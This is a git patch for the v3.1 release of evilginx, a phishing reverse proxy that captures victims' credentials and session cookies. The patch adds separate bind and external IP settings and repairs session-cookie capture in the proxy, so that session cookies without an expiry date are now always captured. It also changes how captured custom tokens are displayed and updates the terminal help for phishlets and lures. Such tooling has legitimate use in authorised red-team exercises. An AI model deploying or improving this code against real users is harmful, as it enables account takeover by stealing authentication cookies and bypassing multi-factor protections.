From a49523a9c41ac95a34b4b07c1d856e200f25ebca Mon Sep 17 00:00:00 2001 From: Kuba Gretzky Date: Tue, 11 Jul 2023 10:03:54 +0200 Subject: [PATCH] v3.1 release --- CHANGELOG | 5 +++++ core/config.go | 46 +++++++++++++++++++++++++++++++++++++--------- core/http_proxy.go | 4 ++-- core/nameserver.go | 8 ++++---- core/terminal.go | 41 +++++++++++++++++++++++++++++------------ main.go | 2 +- 6 files changed, 78 insertions(+), 28 deletions(-) diff --git a/CHANGELOG b/CHANGELOG index b59a48df9..0501756e5 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,3 +1,8 @@ +# 3.1.0 +- Feature: Listening IP and external IP can now be separated with `config ipv4 bind ` and `config ipv4 external ` to help with properly setting up networking. +- Fixed: Session cookies (cookies with no expiry date set) are now correctly captured every time. There is no need to specify `:always` key modifier for `auth_tokens` to capture them. +- Fixed: Captured custom tokens are now displayed properly and values are not truncated. + # 3.0.0 - Feature: TLS certificates from LetsEncrypt will now get automatically renewed. - Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by `certmagic` library. diff --git a/core/config.go b/core/config.go index 1274fd79c..b98bc4022 100644 --- a/core/config.go +++ b/core/config.go @@ -56,11 +56,13 @@ type CertificatesConfig struct { } type GeneralConfig struct { - Domain string `mapstructure:"domain" json:"domain" yaml:"domain"` - Ipv4 string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"` - RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"` - HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"` - DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"` + Domain string `mapstructure:"domain" json:"domain" yaml:"domain"` + OldIpv4 string `mapstructure:"ipv4" json:"ipv4" yaml:"ipv4"` + ExternalIpv4 string `mapstructure:"external_ipv4" json:"external_ipv4" yaml:"external_ipv4"` + BindIpv4 string `mapstructure:"bind_ipv4" json:"bind_ipv4" yaml:"bind_ipv4"` + RedirectUrl string `mapstructure:"redirect_url" json:"redirect_url" yaml:"redirect_url"` + HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"` + DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"` } type Config struct { @@ -129,6 +131,13 @@ func NewConfig(cfg_dir string, path string) (*Config, error) { c.cfg.UnmarshalKey(CFG_GENERAL, &c.general) c.cfg.UnmarshalKey(CFG_BLACKLIST, &c.blacklistConfig) + if c.general.OldIpv4 != "" { + if c.general.ExternalIpv4 == "" { + c.SetServerExternalIP(c.general.OldIpv4) + } + c.SetServerIP("") + } + if !stringExists(c.blacklistConfig.Mode, BLACKLIST_MODES) { c.SetBlacklistMode("unauth") } @@ -204,9 +213,24 @@ func (c *Config) SetBaseDomain(domain string) { } func (c *Config) SetServerIP(ip_addr string) { - c.general.Ipv4 = ip_addr + c.general.OldIpv4 = ip_addr + c.cfg.Set(CFG_GENERAL, c.general) + //log.Info("server IP set to: %s", ip_addr) + c.cfg.WriteConfig() +} + +func (c *Config) SetServerExternalIP(ip_addr string) { + c.general.ExternalIpv4 = ip_addr c.cfg.Set(CFG_GENERAL, c.general) - log.Info("server IP set to: %s", ip_addr) + log.Info("server external IP set to: %s", ip_addr) + c.cfg.WriteConfig() +} + +func (c *Config) SetServerBindIP(ip_addr string) { + c.general.BindIpv4 = ip_addr + c.cfg.Set(CFG_GENERAL, c.general) + log.Info("server bind IP set to: %s", ip_addr) + log.Warning("you may need to restart evilginx for the changes to take effect") c.cfg.WriteConfig() } @@ -653,8 +677,12 @@ func (c *Config) GetBaseDomain() string { return c.general.Domain } -func (c *Config) GetServerIP() string { - return c.general.Ipv4 +func (c *Config) GetServerExternalIP() string { + return c.general.ExternalIpv4 +} + +func (c *Config) GetServerBindIP() string { + return c.general.BindIpv4 } func (c *Config) GetHttpsPort() int { diff --git a/core/http_proxy.go b/core/http_proxy.go index 15c958975..37ad8f99a 100644 --- a/core/http_proxy.go +++ b/core/http_proxy.go @@ -786,7 +786,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da if at != nil { s, ok := p.sessions[ps.SessionId] if ok && (s.IsAuthUrl || !s.IsDone) { - if ck.Value != "" && (at.always || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us + if ck.Value != "" && (at.always || ck.Expires.IsZero() || time.Now().Before(ck.Expires)) { // cookies with empty values or expired cookies are of no interest to us log.Debug("session: %s: %s = %s", c_domain, ck.Name, ck.Value) s.AddCookieAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, ck.Expires) } @@ -813,7 +813,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) { //log.Debug("RESPONSE body = %s", string(body)) token_re := v.search.FindStringSubmatch(string(body)) - if token_re != nil { + if token_re != nil && len(token_re) >= 2 { s.BodyTokens[k] = token_re[1] } } diff --git a/core/nameserver.go b/core/nameserver.go index 140d0a841..0b0c823c8 100644 --- a/core/nameserver.go +++ b/core/nameserver.go @@ -25,7 +25,7 @@ func NewNameserver(cfg *Config) (*Nameserver, error) { o := &Nameserver{ serial: uint32(time.Now().Unix()), cfg: cfg, - bind: fmt.Sprintf("%s:%d", cfg.GetServerIP(), cfg.GetDnsPort()), + bind: fmt.Sprintf("%s:%d", cfg.GetServerBindIP(), cfg.GetDnsPort()), ctx: context.Background(), } @@ -51,7 +51,7 @@ func (o *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) { m := new(dns.Msg) m.SetReply(r) - if o.cfg.general.Domain == "" || o.cfg.general.Ipv4 == "" { + if o.cfg.general.Domain == "" || o.cfg.general.ExternalIpv4 == "" { return } @@ -74,10 +74,10 @@ func (o *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) { log.Debug("DNS SOA: " + fqdn) m.Answer = append(m.Answer, soa) case dns.TypeA: - log.Debug("DNS A: " + fqdn + " = " + o.cfg.general.Ipv4) + log.Debug("DNS A: " + fqdn + " = " + o.cfg.general.ExternalIpv4) rr := &dns.A{ Hdr: dns.RR_Header{Name: fqdn, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 300}, - A: net.ParseIP(o.cfg.general.Ipv4), + A: net.ParseIP(o.cfg.general.ExternalIpv4), } m.Answer = append(m.Answer, rr) case dns.TypeNS: diff --git a/core/terminal.go b/core/terminal.go index 0d2751b33..ac250023b 100644 --- a/core/terminal.go +++ b/core/terminal.go @@ -181,8 +181,8 @@ func (t *Terminal) DoWork() { func (t *Terminal) handleConfig(args []string) error { pn := len(args) if pn == 0 { - keys := []string{"domain", "ipv4", "https_port", "dns_port", "redirect_url"} - vals := []string{t.cfg.general.Domain, t.cfg.general.Ipv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RedirectUrl} + keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "redirect_url"} + vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RedirectUrl} log.Printf("\n%s\n", AsRows(keys, vals)) return nil } else if pn == 2 { @@ -193,7 +193,7 @@ func (t *Terminal) handleConfig(args []string) error { t.manageCertificates(false) return nil case "ipv4": - t.cfg.SetServerIP(args[1]) + t.cfg.SetServerExternalIP(args[1]) return nil case "redirect_url": if len(args[1]) > 0 { @@ -205,6 +205,18 @@ func (t *Terminal) handleConfig(args []string) error { t.cfg.SetRedirectUrl(args[1]) return nil } + } else if pn == 3 { + switch args[0] { + case "ipv4": + switch args[1] { + case "external": + t.cfg.SetServerExternalIP(args[2]) + return nil + case "bind": + t.cfg.SetServerBindIP(args[2]) + return nil + } + } } return fmt.Errorf("invalid syntax: %s", args) } @@ -387,12 +399,15 @@ func (t *Terminal) handleSessions(args []string) error { log.Printf("\n%s\n", AsRows(keys, vals)) if len(s.Custom) > 0 { - var ckeys []string = []string{"custom", "value"} - var cvals [][]string + tkeys := []string{} + tvals := []string{} + for k, v := range s.Custom { - cvals = append(cvals, []string{dgray.Sprint(k), cyan.Sprint(v)}) + tkeys = append(tkeys, k) + tvals = append(tvals, cyan.Sprint(v)) } - log.Printf("%s\n", AsTable(ckeys, cvals)) + + log.Printf("[ %s ]\n%s\n", white.Sprint("custom"), AsRows(tkeys, tvals)) } if len(s.CookieTokens) > 0 || len(s.BodyTokens) > 0 || len(s.HttpTokens) > 0 { @@ -602,7 +617,7 @@ func (t *Terminal) handlePhishlets(args []string) error { if n > 0 { out += "\n" } - out += t.cfg.GetServerIP() + " " + h + out += t.cfg.GetServerExternalIP() + " " + h } t.output("%s\n", out) return nil @@ -1009,10 +1024,12 @@ func (t *Terminal) handleLures(args []string) error { func (t *Terminal) createHelp() { h, _ := NewHelp() h.AddCommand("config", "general", "manage general configuration", "Shows values of all configuration variables and allows to change them.", LAYER_TOP, - readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4"), readline.PcItem("redirect_url"))) + readline.PcItem("config", readline.PcItem("domain"), readline.PcItem("ipv4", readline.PcItem("external"), readline.PcItem("bind")), readline.PcItem("redirect_url"), readline.PcItem("wildcards"))) h.AddSubCommand("config", nil, "", "show all configuration variables") h.AddSubCommand("config", []string{"domain"}, "domain ", "set base domain for all phishlets (e.g. evilsite.com)") - h.AddSubCommand("config", []string{"ipv4"}, "ipv4 ", "set ipv4 external address of the current server") + h.AddSubCommand("config", []string{"ipv4"}, "ipv4 ", "set ipv4 external address of the current server") + h.AddSubCommand("config", []string{"ipv4", "external"}, "ipv4 external ", "set ipv4 external address of the current server") + h.AddSubCommand("config", []string{"ipv4", "bind"}, "ipv4 bind ", "set ipv4 bind address of the current server") h.AddSubCommand("config", []string{"redirect_url"}, "redirect_url ", "change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)") h.AddCommand("proxy", "general", "manage proxy configuration", "Configures proxy which will be used to proxy the connection to remote website", LAYER_TOP, @@ -1144,8 +1161,8 @@ func (t *Terminal) checkStatus() { if t.cfg.GetBaseDomain() == "" { log.Warning("server domain not set! type: config domain ") } - if t.cfg.GetServerIP() == "" { - log.Warning("server ip not set! type: config ipv4 ") + if t.cfg.GetServerExternalIP() == "" { + log.Warning("server external ip not set! type: config ipv4 external ") } } diff --git a/main.go b/main.go index ff4564500..cd09606b1 100644 --- a/main.go +++ b/main.go @@ -169,7 +169,7 @@ func main() { return } - hp, _ := core.NewHttpProxy("", cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode) + hp, _ := core.NewHttpProxy(cfg.GetServerBindIP(), cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode) hp.Start() t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)